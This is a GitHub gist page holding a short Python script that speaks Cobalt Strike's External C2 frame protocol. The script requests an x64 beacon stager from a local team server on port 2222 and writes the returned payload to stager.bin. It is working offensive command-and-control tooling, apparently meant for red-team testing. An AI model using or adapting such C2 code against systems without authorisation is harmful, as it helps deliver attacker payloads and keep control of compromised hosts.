Skip to content

Instantly share code, notes, and snippets.

@dtmsecurity

dtmsecurity/getStager.py

Created November 8, 2018 07:40
Show Gist options
  • Save dtmsecurity/44a20a73a2caf5a7d1a92db56ac0b761 to your computer and use it in GitHub Desktop.
Save dtmsecurity/44a20a73a2caf5a7d1a92db56ac0b761 to your computer and use it in GitHub Desktop.
Download ZIP
Simple test script to get a stager from Cobalt Strike External C2
Raw
getStager.py
import socket
import struct
def recv_frame(sock):
try:
chunk = sock.recv(4)
except:
return("")
if len(chunk) < 4:
return()
slen = struct.unpack('<I', chunk)[0]
chunk = sock.recv(slen)
while len(chunk) < slen:
chunk = chunk + sock.recv(slen - len(chunk))
return(chunk)
def send_frame(sock, chunk):
slen = struct.pack('<I', len(chunk))
sock.sendall( slen + chunk )
print("Sent: " + repr(slen + chunk))
def getStage(sock):
send_frame(sock,"arch=x64".encode("ascii"))
send_frame(sock,"pipename=foobar".encode("ascii"))
send_frame(sock,"block=1000".encode("ascii"))
send_frame(sock,"go".encode("ascii"))
stager = recv_frame(sock)
return stager
s = socket.create_connection(('127.0.0.1', 2222))
stg = getStage(s)
print("Got Stage " + str(len(stg)))
s.close()
print("Writing Stager to File: stager.bin")
fh = open("stager.bin","wb")
fh.write(stg)
fh.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment